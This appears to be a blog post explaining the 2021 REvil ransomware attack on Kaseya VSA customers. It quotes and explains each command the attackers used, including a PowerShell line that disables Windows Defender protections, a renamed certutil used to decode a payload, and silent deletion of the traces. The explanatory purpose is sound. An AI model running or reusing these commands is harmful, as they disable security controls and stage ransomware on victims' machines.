The timing of attack looks well planned for this US based MSP as most of the people where leaving for long 4th of July weekend(US Independence Day a federal holiday) while attack hit on Friday 2 July 2021.
REvil aka Sodinokibi are notorious cyber-criminal use RAAS (ransomware-as-a-service) active since 2019 they have alleged Russia-linked. They always prefer ransome in crypto-currencies (Bitcoins) as it’s hard to trace and best to hide them self post extortion.
How REvil used a Zero Day in Kaseys Ransomeware attack & compromised MSP clients
Most of Kaseya customer use on prem VSA server placed in client’s on-premises which mange large fleet of servers, now if MSP main machine if infected all client machine too can get impacted. Kaeya VSA software zero day CVE-2021–30116 which was found by a Dutch vulnerability Institute(DIVD) was the one which got exploited by REvil group.
The attack happen when a set of Dos and powershell commands are executed on targete machine, which result encryption. Below is the command that used we will break the commands and try to understand what each of them is doing.
Let us try to break these set of commands and understand it, one by one.
- Run ping on local host for a random number, -n is count here
ping 127.0.0.1 -n 5693 > nul
2) PowerShell Set-MpPreference cmd that configures preferences for Windows Defender with multiple options/parameter's
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- DisableIntrusionPreventionSystem — Indicates whether to configure network protection against exploitation of known vulnerabilities. If you specify a value of $False or do not specify a value, network protection is enabled.
- DisableIOAVProtection — Indicates whether Windows Defender scans all downloaded files and attachments. If you specify a value of $False or do not specify a value, scanning downloaded files and attachments is enabled.
- DisableScriptScanning — Specifies whether to disable the scanning of scripts during malware scans. If you specify a value of $False or do not specify a value, Windows Defender does not scan scripts.
- EnableControlledFolderAccess — Controlled Folder Access helps you protect valuable data from malicious apps and threats, such as ransomware
- EnableNetworkProtection AuditMode — Network protection helps to prevent employees from using any application to access dangerous domains that may host phishing scams, exploits, and other malicious content on the internet.
- Audit Mode: Users and applications can connect to dangerous domains, however if this feature would have blocked access if it were set to Block, then a record of the event will be in the event logs
- MAPSReporting — Specifies the type of membership in Microsoft Active Protection Service. Microsoft Active Protection Service is an online community that helps you choose how to respond to potential threats.
0: Disabled. Send no information to Microsoft. This is the default value. - SubmitSamplesConsent — Specifies how Windows Defender checks for user consent for certain samples. If consent has previously been granted, Windows Defender submits the samples. if the MAPSReporting parameter does not have a value of Disabled, Windows Defender prompts the user for consent.
3) Copy certutil.exe from sys32 to windows to manipulate it
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
4) Append a random number to copied file from sys32
echo %RANDOM% >> C:\Windows\cert.exe
5) Copied CERT util is now used to decode payload of agent.crt and write it to Agent.exe in Kaseya folder.
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
6) Clean up silently cert and cert utils
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
/q Specifies quiet mode
/f Forces deletion of read-only files
7) Finally agent.exe created in step 6 is started by Kaseya AgentMon.exe which inherit high privilege due to its nature of work and start to deploy the actual ransomware on system.
c:\kworking\agent.exe
Why don’t we just use data recovery tools to recover data?
This ransomware perform an in place encryption which means encrypted data are stored in same sectors as original data was and most of recovery tools can’t recover this because of this reason.
What next?
Impacted company’s might look in their backups to restore there system, while closed door negotiations might progress in presence of cyber security course consultants to negotiate the ransomware amount.
Menwhile each of impacted client demanded about 50k in BTC Bitcoin as per ransomware note and REvil is also offering $70 million for Universal decrypter.
Its likely that impacted clients might sue Kaseya for damages, when the dust settles.
In this article we are just trying to give glimpses what happened with this attack and not go in details as there are professional blogs which given much better in depth details of what happened.
We have referred multiple blogs & world like to thanks them work there work.
